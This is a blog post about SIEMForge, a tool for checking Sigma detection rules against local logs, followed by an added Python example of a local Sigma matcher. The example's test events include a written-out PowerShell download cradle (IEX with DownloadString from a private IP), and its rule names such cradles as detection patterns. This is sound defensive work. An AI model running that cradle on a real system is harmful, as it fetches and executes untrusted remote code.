Testing Sigma Rules Against Local Logs Without a SIEM

DEV Community·Jude Hilgendorf·27 days ago

I'd written a few Sigma rules for my home lab and wanted to know whether they actually fired on real Sysmon events. The standard answer is "deploy to Wazuh and replay logs". That's a lot of overhead when I just want to confirm a regex matches. So I built SIEMForge: a Python CLI that loads Sigma YAML files, parses the detection logic, and matches it against JSON, JSONL, syslog, or CSV log files locally. No SIEM required.

This post is the messy version of how it came together. The final code is on GitHub at github.com/TiltedLunar123/SIEMForge.

The problem

I had ten Sigma rules covering things like LSASS dumps, suspicious PowerShell, and registry persistence. To validate them I'd been:

- starting Wazuh in a VM
- shipping a Sysmon JSONL via Filebeat
- SSHing to the manager and tailing alerts.log
- realizing the rule didn't fire because I had a typo in the field name

The round trip on a single rule edit was about 4 minutes. For ten rules iterating through false-positive checks, the math gets bad.…
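The loop the post describes (load a Sigma rule, evaluate its selections and condition against local Sysmon JSONL, see whether it fires) fits in a short script. The block below is an added example written for this page; it is not SIEMForge's code and not the author's. The rule is written as a Python dict rather than YAML so it runs without PyYAML, the Sysmon-style events are constructed, and the allowlisted host in the filter is fictional. It also includes the check the post's anecdote calls for: reporting rule fields that never appear in any event, which is how a typo like `Commandline` stays silent instead of firing.

```python
"""Minimal local Sigma matcher: an added example, not SIEMForge's own code.
Covers string modifiers, list values and and/or/not conditions over named
selections; '1 of ...' quantifiers, keyword lists and aggregations are not."""
import ast
import json
import re
from fnmatch import fnmatchcase

# Constructed rule as a dict (yaml.safe_load on the same .yml gives this shape).
RULE = {
    "title": "PowerShell download cradle",
    "detection": {
        "selection": {
            "Image|endswith": ["\\powershell.exe", "\\pwsh.exe"],
            "CommandLine|contains": ["DownloadString", "Invoke-WebRequest", "IEX"],
        },
        "filter": {"CommandLine|contains": "://updates.corp.example/"},  # fictional allowlist
        "condition": "selection and not filter",
    },
}

# Constructed Sysmon-style process-creation events, one JSON object per line.
EVENTS_JSONL = r"""
{"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -nop -w hidden IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a.ps1')", "ParentImage": "C:\\Windows\\System32\\cmd.exe"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe notes.txt", "ParentImage": "C:\\Windows\\explorer.exe"}
{"EventID": 1, "Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "CommandLine": "pwsh -c Invoke-WebRequest http://updates.corp.example/b.ps1", "ParentImage": "C:\\Windows\\System32\\services.exe"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell Get-Process", "ParentImage": "C:\\Windows\\System32\\cmd.exe"}
"""

def load_jsonl(text):
    """Parse JSONL text into event dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]

def _value_matches(value, pattern, modifier):
    """One value vs one pattern. Sigma compares case-insensitively except under 're';
    a field absent from the event never matches (value is None)."""
    if value is None:
        return False
    if modifier == "re":
        return re.search(str(pattern), str(value)) is not None
    v, p = str(value).lower(), str(pattern).lower()
    ops = {"contains": lambda: p in v, "startswith": lambda: v.startswith(p),
           "endswith": lambda: v.endswith(p), None: lambda: fnmatchcase(v, p)}
    if modifier not in ops:
        raise ValueError(f"unsupported modifier {modifier!r}")
    return ops[modifier]()  # plain values keep Sigma's '*' and '?' wildcards

def _field_matches(spec, patterns, event):
    """'Field|modifier[|all]' against one pattern or a list (OR, or AND with |all)."""
    field, *mods = spec.split("|")
    modifier = next((m for m in mods if m != "all"), None)
    patterns = patterns if isinstance(patterns, list) else [patterns]
    hits = [_value_matches(event.get(field), p, modifier) for p in patterns]
    return all(hits) if "all" in mods else any(hits)

def selection_matches(selection, event):
    """A mapping is AND over its fields; a list of mappings is OR over them."""
    if isinstance(selection, dict):
        return all(_field_matches(k, v, event) for k, v in selection.items())
    if isinstance(selection, list):
        return any(selection_matches(item, event) for item in selection)
    raise ValueError(f"unsupported selection shape: {type(selection).__name__}")

def evaluate_condition(condition, detection, event):
    """Allow-listed AST walk, not eval(): Sigma's 'a and not (b or c)' is also
    valid Python expression syntax, so ast.parse yields the tree directly."""
    def walk(node):
        if isinstance(node, ast.BoolOp):
            results = [walk(v) for v in node.values]
            return all(results) if isinstance(node.op, ast.And) else any(results)
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.Not):
            return not walk(node.operand)
        if isinstance(node, ast.Name) and node.id in detection and node.id != "condition":
            return selection_matches(detection[node.id], event)
        raise ValueError(f"unknown selection or unsupported syntax in {condition!r}")
    try:
        return walk(ast.parse(condition, mode="eval").body)
    except SyntaxError as exc:
        raise ValueError(f"cannot parse condition {condition!r}: {exc}") from None

def run_rule(rule, events):
    """(1-based event number, event) for every event the rule fires on."""
    det = rule["detection"]
    return [(n, ev) for n, ev in enumerate(events, 1)
            if evaluate_condition(det["condition"], det, ev)]

def unseen_fields(rule, events):
    """Rule fields no event carries: the usual reason a rule silently never fires."""
    seen = {k for ev in events for k in ev}
    referenced = set()
    for name, sel in rule["detection"].items():
        for item in (sel if isinstance(sel, list) else [sel]):
            if name != "condition" and isinstance(item, dict):
                referenced.update(k.split("|")[0] for k in item)
    return sorted(referenced - seen)

if __name__ == "__main__":
    events = load_jsonl(EVENTS_JSONL)
    print("rule fields absent from every event:", unseen_fields(RULE, events) or "none")
    for n, ev in run_rule(RULE, events):
        print(f"event {n} fired {RULE['title']!r}: {ev['CommandLine']}")
```

Run against the four constructed events, only the first one fires: the third is a real download cradle but is excluded by `not filter`, which is exactly the kind of allowlist interaction worth checking locally before a rule ships. `unseen_fields` is the cheap guard for the typo problem: if it reports `Commandline`, the rule was never going to fire no matter how the SIEM was configured. The condition is parsed with `ast.parse` and walked with an allow-list of node types, so an arbitrary string in the rule file cannot execute code the way an `eval()` shortcut would let it.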
